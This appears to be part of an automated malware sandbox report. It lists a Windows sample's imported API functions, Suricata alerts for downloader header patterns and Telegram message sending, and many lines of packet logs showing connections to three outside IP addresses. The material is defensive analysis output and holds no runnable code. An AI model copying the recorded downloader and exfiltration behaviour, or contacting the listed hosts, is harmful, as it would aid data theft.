USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T18:46:34.936633+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:36.155345+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:36.756257+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49732 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:37.467754+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:38.042437+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:38.734359+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49735 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:40.664480+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49738 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:41.389629+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:42.717746+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49741 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:47.029383+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | TCP
2025-01-10T18:46:50.327134+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49754 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:51.280272+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49754 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:51.865598+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49756 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:52.702279+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49757 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:53.603779+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49758 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:56.318091+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49763 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:58.931382+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49767 | 104.21.64.1 | 443 | TCP
2025-01-10T18:47:02.653410+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49772 | 149.154.167.220 | 443 | TCP
                                                                                                          Jan 10, 2025 18:46:35.925177097 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:35.930146933 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.113127947 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.120433092 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120480061 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.120553017 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120826006 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120834112 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.155344963 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.599423885 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.604985952 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.605009079 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756227970 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756306887 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756433964 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.756855965 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.764527082 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.768656015 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.769526958 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.769610882 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.774723053 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.774828911 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.774924994 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.779661894 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.418919086 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.420329094 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420381069 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.420465946 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420687914 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420700073 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.467753887 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:37.896147013 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.908333063 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.908369064 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042459965 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042532921 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042589903 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.044351101 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.048892021 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.050010920 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.053891897 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.053935051 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.055150986 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.055210114 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.055321932 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.060277939 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.733916998 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.734359026 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.735586882 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.735622883 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.736121893 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.736121893 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.736149073 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.740405083 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.740596056 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.213536024 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.216315031 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.216331005 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.372960091 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.373051882 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.373543024 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.373755932 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.386624098 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.391602039 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.391707897 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.391823053 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.396586895 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.040877104 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.042249918 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042299032 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.042547941 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042695045 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042709112 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.092911959 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.507543087 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.537659883 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.537694931 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664540052 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664617062 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664669037 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.678976059 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.684127092 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.685364962 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.689105988 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.689162016 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.690115929 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.690172911 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.692640066 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.697422028 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.341200113 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.342700005 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.342829943 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.342909098 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.343936920 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.343971014 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.389628887 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:41.824577093 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.826128960 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.826232910 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994246006 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994405031 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994462013 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.994781971 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.997648001 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:41.998707056 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.004625082 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.004677057 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.005251884 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.005310059 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.005754948 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.011830091 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.667922974 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.669447899 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.669495106 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.669578075 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.670131922 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.670141935 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.717746019 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.174418926 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.177290916 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.177336931 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329265118 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329336882 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329530954 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.353627920 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.415483952 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.420452118 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.421163082 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.424245119 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.428972006 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.079435110 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.080949068 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.080986023 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.081928015 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.082192898 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.082210064 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.123974085 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.535267115 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.537131071 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.537169933 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.680973053 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.681042910 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.681739092 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.682257891 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.686228991 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.687349081 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.691562891 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.691616058 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.692193031 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.692909956 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.693042994 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.697907925 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.348901987 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.350446939 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350497961 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.350569963 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350907087 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350917101 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.389602900 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:45.834587097 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.836496115 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.836575031 CET44349749104.21.64.1192.168.2.4
Timestamp                            Source Port Dest Port Source IP       Dest IP
Jan 10, 2025 18:46:45.977969885 CET  443         49749     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:45.978125095 CET  443         49749     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:45.978221893 CET  49749       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:45.984787941 CET  49749       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:46.141007900 CET  49747       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:46.146394968 CET  80          49747     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:46.146653891 CET  49747       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:46.155514956 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.155564070 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:46.155934095 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.157047033 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.157063007 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:46.783027887 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:46.783101082 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.787220955 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.787242889 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:46.787583113 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:46.797245979 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:46.839335918 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:47.029395103 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:47.029476881 CET  443         49751     149.154.167.220 192.168.2.4
Jan 10, 2025 18:46:47.029540062 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:47.034670115 CET  49751       443       192.168.2.4     149.154.167.220
Jan 10, 2025 18:46:49.349572897 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:49.354646921 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:49.354713917 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:49.354959965 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:49.359899044 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:50.091666937 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:50.095407963 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:50.100312948 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:50.286128044 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:50.319037914 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.319084883 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:50.319164991 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.323060989 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.323071957 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:50.327133894 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:50.836873055 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:50.836958885 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.838321924 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.838352919 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:50.838635921 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:50.889621019 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.892013073 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:50.935324907 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.005916119 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.005976915 CET  443         49755     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.006021023 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.008846998 CET  49755       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.012773037 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.017795086 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:51.227150917 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:51.229212046 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.229255915 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.229484081 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.229799032 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.229813099 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.280272007 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.711812019 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.713567972 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.713591099 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.865588903 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.865653992 CET  443         49756     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:51.865772009 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.868513107 CET  49756       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:51.871757984 CET  49754       80        192.168.2.4     193.122.6.168
